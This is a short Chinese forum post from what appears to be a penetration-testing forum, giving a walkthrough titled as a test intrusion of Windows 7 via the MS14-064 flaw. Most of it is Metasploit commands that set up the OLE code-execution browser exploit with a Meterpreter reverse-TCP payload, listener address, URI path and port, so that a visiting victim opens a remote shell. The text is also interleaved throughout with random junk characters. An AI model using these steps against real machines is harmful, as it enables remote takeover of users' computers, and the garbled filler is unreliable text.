中国网络渗透测试联盟

标题: MS14-064 漏洞测试入侵win7 [打印本页]
作者: admin    时间: 2018-10-20 20:20
标题: MS14-064 漏洞测试入侵win7

: A+ |! X. S n# n 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示 $ b0 X0 v7 n; P! t- n. W

9 S8 Y* y' U5 A3 }8 k. v

3 Y4 W, b- ]: x% R6 p1 V: n 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: ( D* B, x( s' n( M3 s5 G

1 R+ [1 q% }3 C8 b

]4 x- X. w- Y) m9 f c, l! T 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp5 g& i2 t: L* t$ ]# y

F+ r0 E: T% W. }3 P

& l2 p# @8 T3 D/ G2 b. P/ u# q             set AllowPowershellPrompt true: g9 d c% Y( a2 j& o

2 \" Q! G4 i: y4 X3 S% o

: i8 L* ?' \0 a, G5 c E# s             Set LHOST 192.168.0.109 3 ?5 y1 W( S1 @! |. _" L3 G" r/ [

9 I9 I# f) ]6 Z9 X, X

2 {/ Q! ]$ r5 h. o& D; O             set SRVHOST 192.168.0.109 , l3 D3 r2 l+ |- h- {" K& K

7 U; X' T' _9 D

- ~3 N% b, c) c$ Z1 a6 Z/ A             Set uripath share 7 D& U2 m& e/ i; \

* s% S" {1 y0 v; E ]8 F

; K9 g( M2 _# _" a6 b2 `             Set srvport 80 7 F1 w( S* v* C# c! W

. c8 e: N9 \! L- C

/ {4 L4 P' Z1 R3 _1 h   ; u8 ?: S9 b5 {# z% Y. V1 F

1 [/ u J) p6 n* n

: \6 o) e3 a; C2 g+ [   " f, t3 ?- Z6 m

: U1 L% w) x- G. ~3 E! V

% h7 b2 E' }4 Z& b  3 `8 `& w L5 w

7 I" x; {4 J! r) K8 X$ {% X! e

8 z1 z* ]8 Z6 _) u8 F0 z1 P  # w% u) V/ N- A! L+ p: L

$ \$ Q1 b5 ^& U x z4 h

) e6 J& `" ]* s* P   ) T0 N3 E" ^( w! j8 X

- R* `4 ]6 [0 O' l# i6 X% U) u

6 X8 h* B; h7 B. j: B5 z2 _ 下面我们来访问本地地址如图:6 c9 |, o/ P' ~, o

# L. g/ Z; z: K b5 X# h: R1 t

& v8 v, i( m6 t  $ i2 k, ]( R5 d$ S

7 i4 b. u4 Z+ K6 J- O

/ o; E2 S" h: X# ~  - T0 R4 j9 a3 q. ]7 n+ I

: A+ m4 e' _3 y0 M7 f

" D$ h% d2 Q; b; D Q% O % D) Q8 W+ g0 y7 q3 Q# J





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2